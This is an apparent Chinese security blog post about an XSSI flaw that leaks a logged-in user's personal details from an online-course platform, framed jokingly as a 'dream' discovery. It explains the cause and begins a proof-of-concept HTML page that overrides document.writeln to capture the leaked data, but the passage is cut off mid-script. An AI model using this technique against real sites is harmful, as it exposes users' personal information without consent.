【有趣的XSSI漏洞】梦中发现某网课平台信息泄露漏洞
0x00 Disclaimer 由于coronavirus的影响,学校安排我们上网课,可能是由于学习太累,做梦都梦到了上网课了,而且还梦到了一个漏洞百出的网课平台。最近我梦到发现了一个非常有趣的漏洞,在我在梦中发现的这个平台的大大小小的漏洞中,这个虽然不是最严重的,但是是最有趣的。 幸好在做梦的时候还顺手截了图,这才能够跟大家分享。本文所述内容纯属意淫,如果您在现实生活中碰到了长得相似的系统那完全是巧合,和本人一丢丢关系都没有 0x01 漏洞发现 在睡梦中闲来无事抓个包,发现包里面居然有很好玩的内容 什么,一个疑似JS的文件里面包含了我的名字? 赶快翻上去header,发现了这个 这说明了什么?这个头指示浏览器把这个请求回来的东西当作JS代码,由于JS可以允许跨域,攻击者可以在html中精心构造JS来访问这些信息 0x02 漏洞原理成因背景 笔者很懒惰,发现先知社区讲的更好,就直接贴上链接了: https://xz.aliyun.com/t/7204 0x03 漏洞POC编写 这里面所有的信息都是被document.writeln包裹起来了,但是我们可以通过覆盖这个函数实现获取信息而不是傻乎乎地把信息写在页面上。基于这一点,我们可以很容易地写出POC代码 <! DOCTYPE html > < head > < meta charset = "UTF-8" > < title > !!! </ title > </ head > < body > < h1 id = "msg" style = " color:red " ></ h1 > < script > name= '' islogin= 1 ; document.writeln= function (text) { match=text.